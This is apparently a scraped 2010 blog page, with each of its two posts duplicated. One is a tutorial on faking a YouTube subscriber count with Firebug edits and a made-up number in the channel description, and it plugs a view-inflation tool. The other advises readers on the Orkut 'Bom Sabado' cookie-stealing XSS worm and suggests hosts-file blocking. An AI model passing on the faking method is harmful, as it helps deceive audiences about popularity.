1. You should see Firebug in the bottom right hand corner like so.
*Taken down, 10 photo limit.
2. Then go to your "YouTube" account and load your channel.
3. You should see some editing options at the top.
4. Click on "Themes and colors"
5. Then click show advanced options you should see this:
6. Right click on the Font choosier and look for "Inspect element"
7. You should see a menu like this:
8. Change where it says Value="Arial" to Value="Arial Black"
9. Now exit out of "Firebug" and on the Font choosier choose "Vendeta".
Then your font should change.
10. Now choose "Arial" again and you should have Arial Black Font.
Now for the final steps:
11. Copy your channel description into the "About me" Box
12. Set this as your channel description:
Subscribers: 85,396 (Change the number to whatever you want)
Now it will say you have 85,396 Subscribers.
I Recommend that you use "Tube Increaser" to increase your channel views
(so it dosen't look retarded ;)
13. And your done!
Regards kid
How to Hack YouTube to Get More Subscribers
I found many users on YouTube that are making high quality videos, but they
are not getting much subscribers because of the big competition. This
tutorial will show all of you how to make it look like you have hundreds,
thousands and even millions of subscribers!
Before we start you need:
1. Mozilla Firefox [Download]
2. Firebug [Download]
Once you have got those we can begin
1. You should see Firebug in the bottom right hand corner like so.
*Taken down, 10 photo limit.
2. Then go to your "YouTube" account and load your channel.
3. You should see some editing options at the top.
4. Click on "Themes and colors"
5. Then click show advanced options you should see this:
6. Right click on the Font choosier and look for "Inspect element"
7. You should see a menu like this:
8. Change where it says Value="Arial" to Value="Arial Black"
9. Now exit out of "Firebug" and on the Font choosier choose "Vendeta".
Then your font should change.
10. Now choose "Arial" again and you should have Arial Black Font.
Now for the final steps:
11. Copy your channel description into the "About me" Box
12. Set this as your channel description:
Subscribers: 85,396 (Change the number to whatever you want)
Now it will say you have 85,396 Subscribers.
I Recommend that you use "Tube Increaser" to increase your channel views
(so it dosen't look retarded ;)
13. And your done!
Regards kid
Sunday, October 3, 2010
“How to access Orkut inspite of Bom Sabado and stop Scrap Flooding”
///////////////////////////////////////////
How to access Orkut inspite of Bom Sabado and stop Scrap Flooding
If you have logged in Orkut today, You may have came across Bom Sabado!
which means Good Saturday in Portuguese. It is a malicious code or Cookie
stealing virus spreading on orkut which floods your Friends scrapbook with
scraps saying Bom Sabado! This is a major XSS (cross-site scripting) attack
which was observed back in February also.
Orkut Officials havent given any details but various sources on web
confirmed that its a worm that injects a hidden iframe containing a
malicious javascript .js [do not click this], which steals the user cookie
which contains the password in an encoded form.We cannot confirm whether
Bom Sabado is a virus or not but whomsoever is infected should clear
cookies and change password immediately from here.
How to access Orkut and stop Bom Sabado?
The attacker do not get to know your plain text password but can login
using your credentials by impersonating using the cookie to fool the
identification system. So a trivial solution is to disable javascript,
another solution is to disable iframes or u can take an advanced measure by
blocking the domain by editing your hosts file and redirecting it to a safe
address, say 127.0.0.1
Open your Host file with notepad
Windows 95/98/Me c:\windows\hosts
Windows NT/2000/XP Pro c:\winnt\system32\drivers\etc\hosts
Windows XP Home c:\windows\system32\drivers\etc\hosts
and for Windows 7 – C:\windows\system32\drivers\etc\hosts
Add this code at the end -
127.0.0.1 tptools.org
127.0.0.1 www.tptools.org
Still, I would recommend not to use Orkut till the issue is fixed.
How to access Orkut inspite of Bom Sabado and stop Scrap Flooding
If you have logged in Orkut today, You may have came across Bom Sabado!
which means Good Saturday in Portuguese. It is a malicious code or Cookie
stealing virus spreading on orkut which floods your Friends scrapbook with
scraps saying Bom Sabado! This is a major XSS (cross-site scripting) attack
which was observed back in February also.
Orkut Officials havent given any details but various sources on web
confirmed that its a worm that injects a hidden iframe containing a
malicious javascript .js [do not click this], which steals the user cookie
which contains the password in an encoded form.We cannot confirm whether
Bom Sabado is a virus or not but whomsoever is infected should clear
cookies and change password immediately from here.
How to access Orkut and stop Bom Sabado?
The attacker do not get to know your plain text password but can login
using your credentials by impersonating using the cookie to fool the
identification system. So a trivial solution is to disable javascript,
another solution is to disable iframes or u can take an advanced measure by
blocking the domain by editing your hosts file and redirecting it to a safe
address, say 127.0.0.1
Open your Host file with notepad
Windows 95/98/Me c:\windows\hosts
Windows NT/2000/XP Pro c:\winnt\system32\drivers\etc\hosts
Windows XP Home c:\windows\system32\drivers\etc\hosts
and for Windows 7 – C:\windows\system32\drivers\etc\hosts
Add this code at the end -
127.0.0.1 tptools.org
127.0.0.1 www.tptools.org
Still, I would recommend not to use Orkut till the issue is fixed.
Subscribe to:
Posts (Atom)